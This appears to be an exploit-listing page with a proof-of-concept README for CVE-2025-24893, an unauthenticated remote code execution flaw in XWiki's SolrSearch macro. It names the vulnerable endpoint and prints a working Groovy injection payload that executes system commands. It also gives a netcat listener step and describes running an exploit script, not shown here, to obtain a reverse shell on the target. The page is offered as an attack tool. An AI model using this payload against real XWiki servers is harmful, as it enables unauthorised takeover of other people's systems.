Exploit for Eval Injection in Xwiki CVE-2025-24893

Name: Exploit for Eval Injection in Xwiki CVE-2025-24893
Rating: 5 (9 reviews)
2026-06-21 | CVSS 9.8
## https://sploitus.com/exploit?id=C558BD70-1D0A-5175-B681-DC19927F031B
# CVE-2025-24893 - XWiki Unauthenticated RCE Exploit POC

> ⚠️ Unauthenticated Remote Code Execution in XWiki  
> 🛠️ PoC implementation by [@dollarboysushil](https://dollarboysushil.com)

## 💡 Overview

**CVE-2025-24893** is a critical RCE vulnerability in [XWiki](https://xwiki.org), caused by unsafe Groovy expression handling inside the `SolrSearch` macro. An attacker can inject Groovy code through a crafted GET request, leading to **remote code execution** (no authentication required).

- **Severity:** Critical (CVSS 9.8)
- **Affected:** Versions < 15.10.11, 16.4.1, 16.5.0RC1

---

## 🛠 Technical Breakdown

The vulnerability resides in the **`SolrSearch` macro** (`Main.SolrSearch`) of XWiki, which handles search input using unsafe Groovy evaluation. The macro fails to sanitize user-supplied input, allowing for **arbitrary code execution**.

### 🔥 Vulnerable Endpoint

```
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
```

An attacker can inject Groovy code into the `text` parameter, which is evaluated server-side due to improper input handling within the macro system.

### 💥 Example Payload

```text
}}}{{async async=false}}{{groovy}}'id'.execute(){{/groovy}}{{/async}}
```

This leads to unauthenticated **Remote Code Execution (RCE)** on vulnerable XWiki instances.

### 🔬 Proof-of-Concept (PoC) Demonstration

#### 🧪 Target Environment

The vulnerable target is an XWiki instance running version `15.10.8`, which is affected by CVE-2025-24893.

![Vulnerable XWiki Interface](images/image.png)

---

#### 📡 Preparing the Listener

Start a Netcat listener on the attacker's machine to capture the reverse shell connection:

```bash
nc -lvnp 1337
```

![Netcat Listener Active on Port 1337](images/image1.png)

---

#### 🚀 Launching the Exploit

Run the exploit script `CVE-2025-24893-dbs.py` to deliver the Groovy-based RCE payload to the vulnerable XWiki endpoint.

![Running Exploit Script](images/image2.png)

---

#### 💻 Successful Remote Shell Access

Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.

![Reverse Shell Acquired](images/image3.png)

---

### 📚 References

- OffSec Blog: [CVE-2025-24893 XWiki Groovy RCE](https://www.offsec.com/blog/cve-2025-24893/)
- NVD Entry: [CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)